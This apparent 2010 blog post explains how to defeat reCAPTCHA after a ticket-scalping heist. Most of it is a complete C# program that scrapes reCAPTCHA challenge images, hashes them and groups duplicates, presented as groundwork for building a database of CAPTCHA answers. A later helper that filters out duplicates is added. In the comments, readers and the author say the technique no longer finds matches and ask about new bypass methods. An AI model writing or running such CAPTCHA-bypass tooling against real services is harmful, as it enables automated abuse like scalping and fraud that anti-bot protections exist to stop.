XSS - Cross-Site Scripting: Scraping

After reading about the $25 million online ticket heist and the involvement of the reCAPTCHA service, I decided to see whether the reported flaw was still present. From the article:

[The perpetrators] wrote a script that impersonated users trying to access Facebook, and downloaded hundreds of thousands of possible CAPTCHA challenges from reCAPTCHA. They identified the file ID of each CAPTCHA challenge and created a database of CAPTCHA “answers” to correspond to each ID. The bot would then identify the file ID of a challenge at Ticketmaster and feed back the corresponding answer.

If the writer was referring to the ID passed to http://api.recaptcha.net/image via the query string, the vulnerability appears to be fixed, as the ID is now temporary. However, the same images are still served more than once, and hashing each downloaded file with a cryptographic hash function such as MD5 lets us identify byte-for-byte duplicates. The following C# console application downloads a number of CAPTCHA images from reCAPTCHA (set by the imageCount constant), hashes each one, groups the files by hash, and writes the groups to a text file. Downloading as few as 1024 images can yield several identical images. Building on this, one could potentially pull off the reCAPTCHA attack described in the article.


using System;
using System.Text;
using System.Text.RegularExpressions;
using System.IO;
using System.Net;
using System.Collections.Generic;
using System.Security.Cryptography;

namespace reCAPTCHAScrape
{
    class Program
    {
        static string Request(string Url)
        {
            HttpWebRequest request = WebRequest.Create(Url) as HttpWebRequest;

            string s;

            using (StreamReader reader =
                new StreamReader(request.GetResponse().GetResponseStream()))
                s = reader.ReadToEnd();

            return s;
        }

        static void GetCaptchaImage(int FileNum)
        {
            Regex scriptURLRegex =
                new Regex(@"<script\s*type\s*=\s*""text/javascript""\s*" +
                    @"src\s*=\s*""([^""]+)""\s*><\s*/script>");

            Regex scriptRegex = new Regex(@"challenge\s*:\s*'([^']+)'");

            string pageURL = "http://recaptcha.net/fastcgi/demo/recaptcha";

            string resp = Request(pageURL);

            string scriptURL = scriptURLRegex.Match(resp).Groups[1].Value;

            resp = Request(scriptURL);

            string ID = scriptRegex.Match(resp).Groups[1].Value;

            string imageURL = "http://api.recaptcha.net/image?c=" + ID;

            HttpWebRequest request =
                WebRequest.Create(imageURL) as HttpWebRequest;

            // A single Stream.Read call may return fewer bytes than the whole
            // image, so copy the response to disk until Read returns 0.
            byte[] buffer = new byte[8192];

            using (WebResponse response = request.GetResponse())
            using (Stream s = response.GetResponseStream())
            using (FileStream stream = File.Create(FileNum + ".jpg"))
            {
                int len;

                while ((len = s.Read(buffer, 0, buffer.Length)) > 0)
                    stream.Write(buffer, 0, len);
            }
        }

        static void DigestImages(string Path)
        {
            DirectoryInfo info = new DirectoryInfo(Path);

            FileInfo[] files = info.GetFiles("*.jpg");

            MD5CryptoServiceProvider md5 = new MD5CryptoServiceProvider();

            Dictionary<string, List<FileInfo>> digestDictionary =
                new Dictionary<string, List<FileInfo>>();

            foreach (FileInfo f in files)
            {
                byte[] buffer = File.ReadAllBytes(f.FullName);

                byte[] digest = md5.ComputeHash(buffer);

                StringBuilder hexStringBuilder = new StringBuilder();

                foreach (byte b in digest)
                    hexStringBuilder.Append(Convert.ToString(b,
                        16).PadLeft(2, '0'));

                string hexString = hexStringBuilder.ToString();

                if (digestDictionary.ContainsKey(hexString))                
                    digestDictionary[hexString].Add(f);
                else
                    digestDictionary.Add(hexString, new List<FileInfo>() { f });
            }

            StringBuilder results = new StringBuilder();

            foreach (string s in digestDictionary.Keys)
            {
                results.AppendLine(s);

                foreach (FileInfo f in digestDictionary[s])
                    results.AppendLine(f.FullName);

                results.AppendLine();
            }

            string filename = @".\Results_" + Environment.TickCount + ".txt";

            File.WriteAllText(filename, results.ToString());                        
        }

        static void Main(string[] args)
        {
            const int imageCount = 1024;

            Console.Write("Downloading images");

            for (int i = 0; i < imageCount; i++)
            {
                try
                {
                    GetCaptchaImage(i);

                    Console.Write(".");
                }
                catch (System.Exception ex)
                {
                    Console.WriteLine(ex.ToString());
                }
            }

            Console.WriteLine("\r\nSearching for matches...");

            DigestImages(@".\");

            Console.WriteLine("Complete. Press any key to continue...");
            Console.ReadKey();
        }
    }
}

A match in the output looks like this:


cf75401ef23c167260aa6d93bb7fbc42
C:\Source\reCAPTCHAScrape\reCAPTCHAScrape\bin\Debug\533.jpg
C:\Source\reCAPTCHAScrape\reCAPTCHAScrape\bin\Debug\869.jpg
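
Because the results file lists every hash, including those with only one file, real matches can be hard to spot among 1024 entries. The following is a minimal sketch, not part of the original program, that parses text in the layout shown above (a hash line, one path per line, then a blank line) and keeps only the hashes shared by two or more files. The DuplicateReport class and FindDuplicates method are hypothetical names introduced for illustration.

```csharp
using System;
using System.Collections.Generic;

static class DuplicateReport
{
    // Parses text in the Results_*.txt layout (hash line, one path per line,
    // blank line) and returns only the hashes that have two or more files.
    public static Dictionary<string, List<string>> FindDuplicates(string resultsText)
    {
        var duplicates = new Dictionary<string, List<string>>();
        string hash = null;
        List<string> paths = null;

        // Normalize line endings so both \r\n and \n input is handled.
        string[] lines = resultsText.Replace("\r\n", "\n").Split('\n');

        foreach (string raw in lines)
        {
            string line = raw.Trim();

            if (line.Length == 0)
            {
                // A blank line closes the current group.
                if (hash != null && paths.Count > 1)
                    duplicates[hash] = paths;

                hash = null;
                paths = null;
            }
            else if (hash == null)
            {
                // The first non-blank line of a group is the hash.
                hash = line;
                paths = new List<string>();
            }
            else
            {
                paths.Add(line);
            }
        }

        // Close a final group that is not followed by a blank line.
        if (hash != null && paths.Count > 1)
            duplicates[hash] = paths;

        return duplicates;
    }
}
```

Assuming the results were written to a file, calling DuplicateReport.FindDuplicates(File.ReadAllText(filename)) and printing each key with its list of paths would show only groups like the one above.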

5 comments:

Anonymous, May 12, 2010 at 2:56 PM
I'm currently testing this (in PHP though), but it doesn't work.
After 2000 files, no matches :(

John Leitch, May 12, 2010 at 4:13 PM
I just ran it again and didn't get any either. It looks like the fun might be over for now, although I have another method in mind.

Anonymous, July 7, 2010 at 11:59 AM
Hello John, I read your comment about having a new method in mind. I am interested in it. Would you mind posting an article or comment about it?

John Leitch, July 11, 2010 at 11:58 AM
When I get some free time I'll post an article about it.

Alzie, September 13, 2010 at 12:58 AM
John, did you get that free time? I'm interested as well in any new techniques you have in mind.

Tuesday, March 2, 2010

Scraping - reCAPTCHA Hack
